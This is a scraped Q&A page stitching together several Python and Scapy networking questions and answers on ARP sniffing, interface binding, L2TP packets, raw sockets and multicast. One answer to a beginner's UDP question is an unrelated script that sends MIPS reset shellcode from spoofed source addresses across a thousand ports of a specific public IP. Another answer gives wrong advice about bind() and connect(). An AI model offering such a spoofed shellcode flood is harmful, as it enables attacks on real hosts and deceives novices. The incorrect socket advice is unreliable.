Trying to create a function that does the following:
Uses sniff() function to listen for traffic at the en0ps3 interface
Handle traffic picked up by the sniff() function
Store the source IP address and source MAC address.
If an IP address has already been stored, but a different MAC address is seen then the script should also store this additional MAC address
The user should see a list of hosts appear in the terminal while the script is running
(I have another separate sample script that generates ARP traffic for testing functionality)
Output I'm getting is below - can anyone confirm if its correct? I'm new, and struggling with Scapy to validate my work:
^CEther / ARP who has 192.168.1.10 says 192.168.1.1
Ether / ARP is at 10:11:12:ab:ab:ab says 192.168.1.10
Ether / ARP who has 192.168.1.11 says 192.168.1.2
Ether / ARP is at 10:11:12:bc:bc:bc says 192.168.1.11
Ether / ARP who has 192.168.1.12 says 192.168.1.3
Ether / ARP is at 10:11:12:cd:cd:cd says 192.168.1.12
Ether / ARP who has 192.168.1.13 says 192.168.1.4
Ether / ARP is at 10:11:12:de:de:de says 192.168.1.13
Ether / ARP who has 192.168.1.14 says 192.168.1.5
Ether / ARP is at 10:11:12:ef:ef:ef says 192.168.1.14
Ether / ARP who has 192.168.1.15 says 192.168.1.6
Ether / ARP is at 10:11:12:f0:f0:f0 says 192.168.1.15
Ether / ARP is at de:ad:be:ef:de:ad says 192.168.1.10
My code is
from scapy.all import *
ethernetHeader = Ether()
ipHeader = IP()
icmpHeader = ICMP()
pkt = ethernetHeader/ipHeader/icmpHeader ##filtering out ARP traffic with an op code of 2 or "is-at"
def filter_packets(packets):
def packet_handler(pkt):
packets.append(pkt)
return packet_handler
def main():
packets = []
sniff(iface="enp0s3", prn=filter_packets(packets))
for p in packets:
print(p.summary(ipHeader))
main()
Related
I have a raspberry pi that is both connected to the internet via Wlan and a local device via Ethernet. So it has two IPs; one for each endpoint.
This is how it looks like simplified when running ifconfig; with different IPs for privacy
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 189.168.200.110 netmask 0.0.0.0 broadcast 255.255.255.255
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 189.168.201.79 netmask 255.255.255.0 broadcast 192.168.1.255
This is the code that python is using to send a message to the device through the Ethernet with that gateway's ip
TCP_PORT = 3001
SERVER_IP_AD = "189.168.200.110"
CLIENT_IP_AD = "189.168.200.155"
BROADCAST_IP = "255.255.255.255"
def sendMessage(self, file_path, client_ip=CLIENT_IP_AD):
print('message en route')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((self.SERVER_IP_AD, 0))
s.connect((client_ip, self.TCP_PORT)) #**ERROR IS HERE**
MESSAGE = self.openFile(file_path)
s.send(MESSAGE.encode())
data = s.recv(self.BUFFER_SIZE)
s.close()
return data
Using wireshark I can see that the package is being sent through the Wlan interface instead of the Ethernet interface with the correct IP source and IP destination.
How do I tell python to use the correct interface when sending out the package?
In my opinion, you can establish Tcp connection with Ethernet, cause there isn't shaking hands by Ethernet
And, you shouldn't use s.bind() and s.connect() at the same time. Because the former is for UDP client, and the later is for TCP client. Have a try with only s.bind().
I am actually new to scapy/networking
Like for ICMP I can send a ICMP packet/request like
srp(Ether(src=u'd2:ff:90:c5:1f:21', dst=u'9c:22:14:4f:6c:ac', type=2048)/IP(src=u'238.166.15.14', dst=u'70.74.2.83')/ICMP(type=8)/Raw(load='UZe5ICdH'),timeout=10,iface="ens192.50")
on the other side I can send a packet/reply like
srp(Ether(dst=u'd2:ff:90:c5:1f:21', src=u'9c:22:14:4f:6c:ac', type=2048)/IP(dst=u'238.166.15.14', src=u'70.74.2.83')/ICMP(type=0)/Raw(load='UZe5ICdH'),timeout=10,iface="ens192.50")
Can some one help me with L2TP ?
LT2P uses UDP packets underlying over 1701 port to communicate.
Packet structure for L2TP is as below:
Ether / IP / UDP/ L2TP / PADDING
So we will be sending a packet like
srp(Ether(src=u'12:24:52:93:c6:54', dst=u'ea:26:7c:6b:02:dc', type=2048)/IP(src=u'22.159.236.164', dst=u'182.187.41.246')/UDP(dport=1701, sport=1701)/L2TP(pkt_type=2)/Padding(load='5Z0WZ'), iface='ens192.50', timeout=5)
Here am sending a message packet over l2tp (i.e pkt_type=2). We can also send control messages too, like Start-Control-Connection-Request, Hello etc.
Reference sites:
http://docstore.mik.ua/orelly/networking_2ndEd/fire/ch14_12.htm
https://technet.microsoft.com/en-us/library/cc958047.aspx
http://www.networksorcery.com/enp/protocol/l2tp.htm
I want to use Python to capture all the IP packets on an Ubuntu’s network. By using the below code, I’ve got all the packet with the Ethernet header. How can I get rid of the Ethernet header and directly get only the IP packets?
s = socket.socket( socket.AF_PACKET , socket.SOCK_RAW , socket.ntohs(0x0003))
while True:
packet = s.recvfrom(65565)
I would suggest you have a look at scapy, a tool that enables the user to send, sniff, dissect and forge network packets. the sniffing paragraph is a probably what you're looking for. Here's an example where I capture 10 IP packets, show a summary of their information, then store them to a pcap file:
$ scapy
Welcome to Scapy (2.3.2)
>>> pkts = sniff(filter='ip', count=10)
>>> print len(pkts)
10
>>> pkts.nsummary()
0000 Ether / IP / TCP 31.13.90.2:https > 192.168.1.14:63748 PA / Raw
0001 Ether / IP / TCP 192.168.1.14:63748 > 31.13.90.2:https A
0002 Ether / IP / TCP 192.168.1.14:63748 > 31.13.90.2:https PA / Raw
0003 Ether / IP / TCP 31.13.90.2:https > 192.168.1.14:63748 PA / Raw
0004 Ether / IP / TCP 192.168.1.14:63748 > 31.13.90.2:https A
0005 Ether / IP / UDP 192.168.1.21:48007 > 192.168.1.255:32412 / Raw
0006 Ether / IP / UDP 192.168.1.21:49808 > 192.168.1.255:32414 / Raw
0007 Ether / IP / UDP 192.168.1.11:64817 > 192.168.1.255:32412 / Raw
0008 Ether / IP / UDP 192.168.1.11:64819 > 192.168.1.255:32414 / Raw
0009 Ether / IP / UDP 192.168.1.11:49670 > 239.255.255.250:ssdp / Raw
>>> wrpcap("temp.cap",pkts)
>>>
socket (AF_INET, SOCK_RAW, IPPROTO_RAW) will get you an IP Layer raw socket
socket (PF_PACKET, SOCK_RAW, htons (ETH_P_ALL)) will get you a layer 2 raw socket`
There are examples (in C) here.
I made a simple program that tries to send a UDP packet to my ncat server
here is the code:
from scapy.all import *
sr1(IP(dst="127.0.0.1")/UDP(dport=8080)/"TAG1")
but I get nothing from my ncat server, can someone please tell me what I am doing wrong?
when developing a network related project, i suggest you install capturing software like tcpdump or wireshark. It hepls you to see what is in the network.
To get all packets to 127.0.0.1 using tcpdump, you may use following command:
tcpdump -i eth0 "dst 127.0.0.1 and dst port 8080"
Try this
from scapy.all import *
print("Remote UDP Mips Fuzzer - Reset Shellcode")
for num in range(0,10):
data = "00" * int(str(num))
sc = "3c06432134c6fedc3c05281234a519693c04fee13484dead24020ff80101010c"
a = data+sc
for ip in range(0,255):
for port in range(0,1000):
i=IP()
i.dst="213.48.152.128" #Change this
i.src="10.0"+"."+str(ip)+"."+str(ip)
udp=UDP()
udp.sport=int(str(port))
udp.dport=int(str(port))
sendp(i/udp/a)
See how it works ?
tcmpdump can view all the multicast traffic to specific group and port on eth2, but my Python program cannot. The Python program, running on Ubuntu 12.04:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Multicast port is 52122
sock.bind(('', 52122))
# Interface eth2 IP is 1.2.3.4, multicast group is 6.7.8.9
mreq = socket.inet_aton('6.7.8.9')+socket.inet_aton('1.2.3.4')
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
while True:
print '\nwaiting to receive message'
data, address = sock.recvfrom(1024)
print data
When I use another program to send a multicast packet to eth2, it works and prints the packet. But it fails to see all the current multicast traffic. If I run tcpdump on eth2 on the same port and group as the above program:
sudo tcpdump -i eth2 host 6.7.8.9 and port 52122
it sees both the packets I send from another program AND all the current multicast traffic. It's output looks likes this...
# Packet sent from my other program
09:52:51.952714 IP 1.2.3.4.57940 > 6.7.8.9.52122: UDP, length 19
# Packet send from the outside world
09:52:52.143339 IP 9.9.9.9.39295 > 6.7.8.9.52122: UDP, length 62
Why can't my program see the packets from the outside world? How can I modify it (or something else) to fix this?
Edit:
I should have mentioned, the interface this going over is not eth2 but eth2.200 a VLAN. (The local IP and the tcpdump commands are all run with eth2.200, I just changed that in this question to make it simpler.) Based on this answer that could be the problem?
Edit #2:
netstat -ng when the program is running shows eth2.200 subscribed to 224.0.0.1 and 6.7.8.9`.
tshark -i eth2.200 igmp shows three repeated 1.2.3.4 -> 6.7.8.9 IGMP 46 V2 Membership Report / Join group 6.7.8.9 when the program first starts. When the program process is killed, it shows 1.2.3.4 -> 224.0.0.2 IGMP 46 V2 Leave group 6.7.8.9. There is also an infrequent 1.2.3.1 -> 224.0.0.1 IGMP 60 V2 Membership Query, general, where 1.2.3.1 is 1.2.3.4's gateway.
Not sure if it will help, but the routing table looks like:
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 1.2.5.6 0.0.0.0 UG 0 0 0 eth1
1.2.3.0 0.0.0.0 255.255.255.240 U 0 0 0 eth2.200
Thank you!
Finally! Found this question on ServerFault that addresses the same thing. Basically the kernel was not forwarding on / was filtering out the packets because it thought the sourced address was spoofed.
Changed the settings in /etc/sysctl.conf to match:
net.ipv4.conf.default.rp_filter = 0
net.ipv4.conf.all.rp_filter = 0
net.ipv4.ip_forward = 1
Rebooted and everything works.